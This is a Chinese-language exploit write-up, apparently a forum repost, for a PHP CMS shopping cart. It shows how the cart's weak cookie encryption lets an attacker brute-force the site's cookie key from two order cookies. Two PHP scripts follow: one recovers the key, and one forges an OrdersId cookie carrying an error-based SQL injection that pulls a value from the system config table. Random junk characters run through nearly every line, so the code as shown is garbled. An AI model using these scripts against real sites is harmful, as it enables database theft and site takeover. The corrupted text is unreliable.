www.xxx.com/plus/search.php?keyword=
' F. H2 ?9 [9 d$ m在 include/shopcar.class.php中. o" s7 k5 ^* a- v% r+ H- Q
先看一下这个shopcar类是如何生成cookie的
9 }" _; l& t# h/ i239 function saveCookie($key,$value). M) O& M- [9 `* y" z3 |! \
240 {
2 X% u0 t# C; M, A6 m9 m# y, _ j241 if(is_array($value))
1 m$ a4 v; \) ^ ?& u6 |242 {
2 C/ g& U% \! g243 $value = $this->enCrypt($this->enCode($value));9 O9 \+ t+ u. D: Z, E- T
244 }
! N% D% z' f1 R7 l245 else( f: Y. O; o4 e- z" m3 _
246 {
4 Y: U& W+ x# r" ?! Y247 $value = $this->enCrypt($value);; p' p9 T0 ]; U# f5 }$ @5 ?4 l
248 }
! N. Y( d8 E/ f: Z: v+ r8 x1 B249 setcookie($key,$value,time()+36000,’/');
( e0 F' V" `6 s* A6 |) ~3 |250 }& G2 }2 p7 \+ C' O V; K
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
2 X+ X; h8 E! E" C" |" V @3 |186 function enCrypt($txt)
4 `3 H) O- h) f, R- j5 b187 {( C8 g' ]( v8 s: }) I
188 srand((double)microtime() * 1000000);
4 J( M& ?" j, X% V189 $encrypt_key = md5(rand(0, 32000));5 v0 _9 M% I8 y% f/ K& C
190 $ctr = 0;% ]) A4 r+ Y# z7 ~, {: g
191 $tmp = ”;
* T) b/ y- Z6 M# ~192 for($i = 0; $i < strlen($txt); $i++)8 R9 `+ l! a) K6 U
193 {
) G2 c F+ m, d- R r2 I) M" b194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% V! J" k% c* F) v+ _195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);9 H8 D( A3 f! F1 M
196 }
0 y3 ^% ?2 e$ m% s197 return base64_encode($this->setKey($tmp));
! ?* n) U1 p& m& o E1 B198 }
0 L5 X. t4 U2 Q9 g5 g6 @4 `213 function setKey($txt)
& B2 o) s& Z) v. \% F214 {
: \+ s. @* W( o$ u5 _4 Q! A; f215 global $cfg_cookie_encode;! ~2 d! y# k1 r; B2 |; J
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
1 ]4 r0 G5 t$ |; O: P217 $ctr = 0;1 X: l0 S! |+ s- _( t; o' y4 \+ N
218 $tmp = ”;
& W+ d6 m( Z" i& G, m' D) q219 for($i = 0; $i < strlen($txt); $i++)$ d+ R, [0 y. r
220 {
. E1 L: O! f. H0 v5 G221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
o# U/ x; E( J) `: N% d222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
- H0 ?4 s6 r" r223 }
0 b- S1 o& g3 h! w1 ^9 g4 C224 return $tmp;* M5 P j# j& q5 I& g
225 }0 p+ |' c& u. T4 E6 t9 M' i# r" l
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的/ K0 P6 j. i, P3 N! A
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
" R9 W9 u! T1 H具体代码如下:
" W: d& S$ ?+ s! S9 I! W<?php) Y" |1 r1 S3 `
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
4 }7 N! U2 s$ c. t$ S- K; u' Y7 b$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here4 y; g. b" H6 \8 y% z
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here+ D+ P% k, f& ]
function reStrCode($code,$string)
8 ^, b1 W$ q/ G% A{
2 v. j5 \5 r* q3 o- ]7 g& A' T+ C$code = base64_decode($code);. o* K' ]- ^9 p5 q0 {+ @
$key = “”;% v0 J! c+ l* i; ^
for($i=0 ; $i<32 ; $i++)
1 l2 d! K6 ~8 D+ a4 q( G7 j) [{
& k8 v, ? ~. h! h$ m% D9 o$ u$key .= $string[$i] ^ $code[$i];
' b- a" j/ w2 n# F$ @, O}
! |" E5 Z0 z& jreturn $key;
% a# z2 k8 F$ u) r7 a) \5 ? b}
- S" q9 M) o4 f- Lfunction getKeys($cookie,$plantxt)5 \( e$ B3 k( X f
{2 l! D; ]: R1 z4 L- q' f
$tmp = $cookie;
# J. F& m4 z, M2 o/ t' s$results = array();
' d8 }' r, j& C& D2 Wfor($j=0 ; $j < 32000; $j++)
& l; z6 w1 A5 W{8 y/ Y. @) F. F `: }$ l( C, R+ K/ x
/ W/ O/ H) F) s6 i& Z; r
$txt = $plantxt;& e0 E9 l4 X% ]& W& O* U( U+ {! S
$ctr = 0;2 R' y" g2 J2 Z0 p9 V- S# ^
$tmp = ”;* ?( V; _+ D; c B, d# m5 u
$encrypt_key = md5($j);
3 I+ B! g( d$ D- D% B1 Bfor($i =0; $i < strlen($txt); $i ++)
; Z X) n; P6 F0 {* e. y3 \{
8 H+ z% \, \5 {0 P$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- j0 u8 o% Z7 q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
/ j/ d* p; D" D" D( X}
6 q# `4 W0 C9 @4 a# M$string = $tmp;: I* y* l8 n8 I' O, G, ?9 Z# G
$code = $cookie;1 _; Z0 A+ C! [1 e$ | v5 C
$result = reStrCode($code,$string);' M1 C, m" r: k& u, k
if(eregi(‘^[a-z0-9]+$’,$result))
: v- ^2 ? S1 b8 o4 ]5 \2 N* {{
) D# `6 a3 k6 m' g9 zecho $result.”\n”;. u# Q; Q) o; j" k4 s9 B! ~
$results[] = $result;
. S) S* Z0 A4 Y9 k9 i}
4 C. E$ V" Z) a) j: I7 Z}
* {! z* z4 t: N6 W. w5 ?return $results;
5 y5 k# u: T) j4 s}% N' _; t* U# t q& P! \
$results1 = getKeys($cookie1,$plantxt);
0 X- K5 a* O) R, @$results2 = getKeys($cookie2,$plantxt);# f. N4 L* Y/ J0 F7 M) M' g
print “\n——————–real key————————–\n”;8 }+ E2 s7 f* N0 q5 O5 T; s
foreach($results1 as $test1)
/ N+ h- Z1 V) c: Y{6 a( u. m+ A& q9 F; t* x" q
foreach($results2 as $test2) X, i$ X. H, p
{
4 q, H7 y, M' h1 ~( Zif($test1 == $test2)
* i; v0 n0 `3 K* @{
$ \* e+ k+ z: s& ~echo $test1.”\n”;
: R( ?) q2 M: H! H: q; ?}
" B4 W5 Z1 |# I; N9 z. D}
$ Y/ }/ Z/ D" e7 j2 D4 X- \}
/ v* A {# v4 `+ v- I1 R?>
$ K; Y C5 `7 R0 ncookie1 和 cookie2 是我下了两次订单后分别生成的cookie,1 K2 I i T2 c# ]
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1+ C9 N4 `* r& D j
然后推算出md5(strtolower($cfg_cookie_encode))1 I& i7 g6 g, b, N. S, w# Y
得到这个key之后,我们就可以构造任意购物车的cookie4 c$ G; O, Z$ T \
接着看
( s. l# D5 h$ Y' P+ y% t! `3 c20 class MemberShops2 ^# U% g+ E s' a; h2 t7 ?
21 {( S/ V' O# ]. J
22 var $OrdersId;
$ X7 t& }* A9 H( E* D% f23 var $productsId;
0 x7 |. X" h/ j$ L% A# k24
|. J6 W" s d25 function __construct()
4 \$ q6 v+ O& r. V/ P R+ g26 {
/ b# i0 U; z- u8 H' r' T27 $this->OrdersId = $this->getCookie(“OrdersId”);
4 g! z" y& O |# Q' r6 G8 Y0 |/ l28 if(empty($this->OrdersId))
u$ @; m) A5 s8 T& P' X* H+ k* A3 K29 {
1 K( ^! D1 X- O8 g V) A5 }/ G30 $this->OrdersId = $this->MakeOrders();
% _/ i' a1 Y0 O- T% @31 }& H0 X& s4 @& Y
32 }
9 Z& f, j" q" O# g( J发现OrderId是从cookie里面获取的" N# m2 ]$ W4 k( l
然后' ] k; e+ b$ B2 R ^1 H
/plus/carbuyaction.php中的
4 o. m" p' s) ]1 |29 $cart = new MemberShops();6 w0 o* Z% W9 y9 \
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
; j- P9 h: A* f8 _- T2 g……% n) ?$ F- d) |+ V; r( r5 m
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);6 r3 \: q2 o& c5 X- P
接着我们就可以注入了
, K1 q: Q+ c3 y, W5 P通过利用下面代码生成cookie:
6 g% \' L7 ?/ Z, S0 L& h8 ^& ~; ^<?php& b% s6 l4 _ _+ B. x# m4 o
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$ U" e9 R4 l! H4 `; s4 C7 r$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
+ v6 d$ l3 f4 T/ N. {6 m% u5 Kfunction setKey($txt)' R6 b0 q( l1 [; ?. B
{. w2 G# k) D- l( a# [5 d
global $encrypt_key;
3 n) J; a" B* O! @& j; ], ^$ctr = 0;
0 G8 X, \3 y1 d, Y$tmp = ”;2 B5 H5 v+ ~/ B( \/ y
for($i = 0; $i < strlen($txt); $i++)3 d2 D# n1 z# I: d. p Z+ \
{( j/ s) e1 G7 n# D$ J/ {
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% k# n2 e m+ i/ {$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];5 W, o6 I/ x" ?* O! g
}
: P6 J1 o2 P5 t& x) _, s. T" Breturn $tmp;6 c3 s* W/ F# f+ G4 K) u! v. x5 Q
}0 h" P' n! u9 A% O
function enCrypt($txt)
" B% k0 B8 c$ Q; _{
( g- W- D1 Q; }/ x& Q% }5 N0 Z, zsrand((double)microtime() * 1000000);
. m) X8 ?9 c! K% J0 K$encrypt_key = md5(rand(0, 32000));
+ X s2 [( i, f$ctr = 0;
@# c! E2 j7 z# @' t$tmp = ”;
7 M. [ d+ e7 R* Ifor($i = 0; $i < strlen($txt); $i++)
, e0 F" o2 \! D+ N! J0 y1 I% E{ V/ `8 k& x, {' i4 D c
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% K; v- N. p ]3 i
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
& [- O, ~& O- I}
* d- v+ P7 f$ j8 r6 V" sreturn base64_encode(setKey($tmp));5 X; {* w9 H. }$ v/ D/ A
}# l" B E. z% z1 u
for($dest =0;$dest = enCrypt($txt);)
" c* G) W$ F! _! l$ {" o0 P{
! M- z$ s x ?$ ?3 ]8 vif(!strpos($dest,’+'))
# ^2 Y! \; J. l8 L/ Q{
( W! ~4 K8 n' b: l9 t; r+ }break;2 E8 v4 V0 M/ t1 i+ ^; U# ]
}
/ g1 K' Y1 ~1 n; N2 q}# D7 {* f* n* o9 R$ ]2 ]8 A8 _
echo $dest.”\n”;* E$ z1 `; Z3 I( h4 A
?>5 f4 x2 v6 M( w5 T
- f+ B4 Y! E; P( r: {
|